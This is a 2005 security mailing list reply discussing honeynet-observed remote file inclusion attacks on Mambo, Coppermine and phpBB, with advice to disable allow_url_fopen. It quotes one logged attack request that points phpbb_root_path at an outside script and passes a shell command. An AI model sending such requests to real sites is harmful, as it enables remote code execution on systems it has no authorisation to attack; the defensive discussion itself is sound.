WebApp Sec mailing list archives
Re: Mambo, Coppermine and PHPBB Attacks
From: Tofik Suleymanov <tofik () oxygen az>
Date: Tue, 20 Dec 2005 21:40:46 +0000
Paul Laudanski wrote:
On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:Our honeynet has been picking up an increase in the number of code injection attacks in the past few days. Attacks are primarily directed to several popular open source applications: Mambo, Coppermine and PHPBB. Analysis: http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17Nice catch. I checked my logs and found these which appear to be the valid phpbb injection request:81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"Notice the admin_styles.php is written out once. I would suspect that disabling allow_url_fopen directive in php.ini would disallow such a request to execute. This would prevent resources other than files to not be included. But I haven't tested.
From php.ini "Whether to allow the treatment of URLs (like http:// or ftp://) as files."In latest versions of php this option is set to secure mode of operation by default (as far as i know):
allow_url_fopen = Off This option prevents such type of attacks.
Current thread:
- Mambo, Coppermine and PHPBB Attacks Mark Ryan del Moral Talabis (Dec 18)
- RE: Mambo, Coppermine and PHPBB Attacks John Cobb (Dec 19)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 20)
- Re: Mambo, Coppermine and PHPBB Attacks Tofik Suleymanov (Dec 20)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 21)
- Re: Mambo, Coppermine and PHPBB Attacks Yasuo Ohgaki (Dec 24)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 24)
- Re: Mambo, Coppermine and PHPBB Attacks Yasuo Ohgaki (Dec 25)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 25)
- Re: Mambo, Coppermine and PHPBB Attacks Yasuo Ohgaki (Dec 29)
- Re: Mambo, Coppermine and PHPBB Attacks ascii (Dec 29)
- Re: Mambo, Coppermine and PHPBB Attacks Andrew van der Stock (Dec 29)
- Re: Mambo, Coppermine and PHPBB Attacks Tofik Suleymanov (Dec 20)
- Re: Mambo, Coppermine and PHPBB Attacks Jack Tennessee (Dec 22)